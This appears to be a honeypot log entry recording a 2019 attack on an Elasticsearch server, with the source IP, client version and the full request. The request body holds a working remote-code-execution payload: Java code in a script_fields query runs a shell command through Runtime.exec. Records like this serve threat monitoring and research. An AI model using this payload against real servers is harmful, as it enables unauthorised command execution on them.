Attack 6131229a-b7e1-4d3d-bbba-ce4ea4b3ebe3
Details
ID |
6131229a-b7e1-4d3d-bbba-ce4ea4b3ebe3 |
Attack Type |
elasticsearch |
IP Address |
43.249.192.59 |
Username |
|
Password |
|
Client Version |
python-requests/2.4.1 CPython/2.7.8 Windows/2003Server |
Country |
China |
Date |
2019-07-11 07:42AM |
Request Data
{
"path": "",
"method": "GET",
"headers": {
"Accept": "*/*",
"Connection": "keep-alive",
"User-Agent": "python-requests/2.4.1 CPython/2.7.8 Windows/2003Server",
"Accept-Encoding": "gzip, deflate"
},
"hostname": "45.32.57.42:9200",
"form_data": {
"source": "{\"query\": {\"filtered\": {\"query\": {\"match_all\": {}}}}, \"script_fields\": {\"exp\": {\"script\": \"import java.util.*;import java.io.*;String str = \\\"\\\";BufferedReader br = new BufferedReader(new InputStreamReader(Runtime.getRuntime().exec(\\\"mkdir /tmp/python /tmp/mysql\\\").getInputStream()));StringBuilder sb = new StringBuilder();while((str=br.readLine())!=null){sb.append(str);sb.append(\\\"\\r\\n\\\");}sb.toString();\"}}, \"size\": 1}"
}
}